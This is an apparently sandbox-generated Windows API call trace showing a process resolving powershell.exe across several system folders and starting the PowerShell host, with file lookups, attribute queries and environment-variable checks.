	[0563.089] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.090] SetErrorMode (uMode=0x1) returned 0x1
	[0563.090] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.090] SetErrorMode (uMode=0x1) returned 0x1
	[0563.090] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.090] SetErrorMode (uMode=0x1) returned 0x1
	[0563.090] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.091] SetErrorMode (uMode=0x1) returned 0x1
	[0563.091] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.091] SetErrorMode (uMode=0x1) returned 0x1
	[0563.091] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.091] SetErrorMode (uMode=0x1) returned 0x1
	[0563.091] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.092] SetErrorMode (uMode=0x1) returned 0x1
	[0563.092] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.092] SetErrorMode (uMode=0x1) returned 0x1
	[0563.092] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.092] SetErrorMode (uMode=0x1) returned 0x1
	[0563.092] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.093] SetErrorMode (uMode=0x1) returned 0x1
	[0563.093] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0563.093] SetErrorMode (uMode=0x1) returned 0x1
	[0563.093] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.093] SetErrorMode (uMode=0x1) returned 0x1
	[0563.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.094] SetErrorMode (uMode=0x1) returned 0x1
	[0563.094] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.094] SetErrorMode (uMode=0x1) returned 0x1
	[0563.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.094] SetErrorMode (uMode=0x1) returned 0x1
	[0563.094] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.095] SetErrorMode (uMode=0x1) returned 0x1
	[0563.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.095] SetErrorMode (uMode=0x1) returned 0x1
	[0563.095] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.095] SetErrorMode (uMode=0x1) returned 0x1
	[0563.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.095] SetErrorMode (uMode=0x1) returned 0x1
	[0563.096] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.096] SetErrorMode (uMode=0x1) returned 0x1
	[0563.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.096] SetErrorMode (uMode=0x1) returned 0x1
	[0563.096] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.096] SetErrorMode (uMode=0x1) returned 0x1
	[0563.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.097] SetErrorMode (uMode=0x1) returned 0x1
	[0563.097] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.097] SetErrorMode (uMode=0x1) returned 0x1
	[0563.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.097] SetErrorMode (uMode=0x1) returned 0x1
	[0563.097] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.098] SetErrorMode (uMode=0x1) returned 0x1
	[0563.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.098] SetErrorMode (uMode=0x1) returned 0x1
	[0563.098] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.098] SetErrorMode (uMode=0x1) returned 0x1
	[0563.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.099] SetErrorMode (uMode=0x1) returned 0x1
	[0563.099] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.099] SetErrorMode (uMode=0x1) returned 0x1
	[0563.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.099] SetErrorMode (uMode=0x1) returned 0x1
	[0563.099] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.100] SetErrorMode (uMode=0x1) returned 0x1
	[0563.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0563.100] SetErrorMode (uMode=0x1) returned 0x1
	[0563.100] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0563.100] SetErrorMode (uMode=0x1) returned 0x1
	[0563.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0564.517] SetErrorMode (uMode=0x1) returned 0x1
	[0564.517] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0564.518] SetErrorMode (uMode=0x1) returned 0x1
	[0564.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0564.518] SetErrorMode (uMode=0x1) returned 0x1
	[0564.518] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0564.518] SetErrorMode (uMode=0x1) returned 0x1
	[0564.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0564.519] SetErrorMode (uMode=0x1) returned 0x1
	[0564.519] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0564.519] SetErrorMode (uMode=0x1) returned 0x1
	[0564.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0564.519] SetErrorMode (uMode=0x1) returned 0x1
	[0564.519] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0564.520] SetErrorMode (uMode=0x1) returned 0x1
	[0564.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0564.520] SetErrorMode (uMode=0x1) returned 0x1
	[0564.520] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0564.520] SetErrorMode (uMode=0x1) returned 0x1
	[0564.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0564.521] SetErrorMode (uMode=0x1) returned 0x1
	[0564.521] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0564.521] SetErrorMode (uMode=0x1) returned 0x1
	[0564.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0564.521] SetErrorMode (uMode=0x1) returned 0x1
	[0564.521] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0564.522] SetErrorMode (uMode=0x1) returned 0x1
	[0564.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0564.522] SetErrorMode (uMode=0x1) returned 0x1
	[0564.522] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0564.522] SetErrorMode (uMode=0x1) returned 0x1
	[0564.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c71de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0564.523] SetErrorMode (uMode=0x1) returned 0x1
	[0564.523] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c71dfa0 | out: lpFindFileData=0x1c71dfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x3bfeb0
	[0564.524] FindNextFileW (in: hFindFile=0x3bfeb0, lpFindFileData=0x1c71dfb0 | out: lpFindFileData=0x1c71dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0564.524] FindClose (in: hFindFile=0x3bfeb0 | out: hFindFile=0x3bfeb0) returned 1
	[0564.524] SetErrorMode (uMode=0x1) returned 0x1
	[0564.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c71e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0564.525] SetErrorMode (uMode=0x1) returned 0x1
	[0564.525] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c71e2d0 | out: lpFileInformation=0x1c71e2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0564.525] SetErrorMode (uMode=0x1) returned 0x1
	[0564.526] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0564.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.526] CoTaskMemFree (pv=0x3baac0) 
	[0564.528] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0564.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.528] CoTaskMemFree (pv=0x3baac0) 
	[0564.531] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0564.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.532] CoTaskMemFree (pv=0x3baac0) 
	[0564.542] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0564.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.542] CoTaskMemFree (pv=0x3baac0) 
	[0565.819] CoTaskMemAlloc (cb=0x3b) returned 0x1b7e64d0
	[0565.819] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c71e4b8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c71e4b8) returned 0x4550
	[0565.821] CoTaskMemFree (pv=0x1b7e64d0) 
	[0565.824] GetConsoleWindow () returned 0x10316
	[0565.842] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
